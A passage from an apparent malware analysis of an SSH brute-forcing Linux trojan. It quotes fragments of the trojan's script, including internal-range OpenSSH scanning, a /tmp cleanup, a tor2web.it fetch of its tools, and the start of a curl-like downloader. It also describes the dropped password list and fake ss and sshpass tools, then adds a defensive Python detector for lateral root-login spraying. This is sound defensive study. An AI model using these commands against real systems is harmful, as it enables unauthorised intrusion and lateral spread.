#(./ss -r"OpenSSH" 10.0.0.0/16 22 >ip;./r1)
#(./ss -r"OpenSSH" 172.16.0.0/12 22 >ip;./r1)
(./ss -r"OpenSSH" 10.$((RANDOM%255)).0.0/16 22 >ip;./r1)
cd;rm -rf /tmp/.X11-unix/sshd/
fi
}
sockz
iscn $t.tor2web.it &
```

The /sshd tarball pulled through the Tor proxy unpacks to the following (pw + ss + ssh):


Where:

pw --> the SSH brute-force password dictionary
ss --> a script that imitates the ss command
ssh --> a modified sshpass command script

Fetching tools such as curl and ss that the trojan needs, 6.sh:

```bash
function kurl() { read proto server path
```
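Seen from the targets' side, the sweep performed by iscn() above produces bursts of failed root logins from one internal peer against many hosts. The following added Python example (not part of the original analysis) aggregates syslog-format sshd failures per RFC1918 source across the hosts' auth logs and flags spraying peers; the log lines are a constructed sample and the thresholds are assumed values to tune per environment.

```python
import ipaddress
import re
from collections import defaultdict

# syslog-style sshd line: "<Mon DD HH:MM:SS> <host> sshd[<pid>]: Failed password for root from <ip> port <n> ssh2"
FAILED_ROOT_RE = re.compile(
    r"^\w{3}\s+\d{1,2}\s+\d\d:\d\d:\d\d\s+(?P<host>\S+)\s+sshd\[\d+\]: "
    r"Failed password for root from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+"
)
# the sweep in 5.sh only scans these ranges, so the spraying peer is always an internal address
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def find_internal_root_spray(lines, min_targets=3, min_attempts=10):
    """Aggregate failed root logins per internal source across all hosts' auth logs.

    Returns {src: {"targets": distinct hosts hit, "attempts": failures}} for sources that
    hit at least min_targets hosts or made at least min_attempts failed attempts."""
    per_src = defaultdict(lambda: {"targets": set(), "attempts": 0})
    for line in lines:
        m = FAILED_ROOT_RE.search(line)
        if not m or not is_internal(m["src"]):
            continue
        per_src[m["src"]]["targets"].add(m["host"])
        per_src[m["src"]]["attempts"] += 1
    return {src: {"targets": len(v["targets"]), "attempts": v["attempts"]}
            for src, v in per_src.items()
            if len(v["targets"]) >= min_targets or v["attempts"] >= min_attempts}


# Constructed sample log (not a real capture): one infected peer, 192.168.10.23, works through
# its password list against four hosts; an admin mistypes once; an outside address hammers web01.
SAMPLE_LOG = []
for i, host in enumerate(["web01", "db02", "app03", "app04"]):
    for n in range(3):
        SAMPLE_LOG.append("Jul 30 02:%02d:%02d %s sshd[%d]: Failed password for root from "
                          "192.168.10.23 port %d ssh2" % (i, n, host, 4000 + i, 40000 + n))
SAMPLE_LOG.append("Jul 30 02:10:00 web01 sshd[4100]: Failed password for root from 192.168.1.5 port 51000 ssh2")
SAMPLE_LOG.append("Jul 30 02:10:01 web01 sshd[4100]: Accepted password for root from 192.168.1.5 port 51000 ssh2")
for n in range(12):
    SAMPLE_LOG.append("Jul 30 02:11:%02d web01 sshd[4200]: Failed password for root from "
                      "203.0.113.9 port %d ssh2" % (n, 50000 + n))

if __name__ == "__main__":
    for src, stats in find_internal_root_spray(SAMPLE_LOG).items():
        print(src, stats)
```

The external brute force against web01 is deliberately left to a separate, perimeter-focused rule; this check only answers the lateral-movement question raised by 5.sh.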

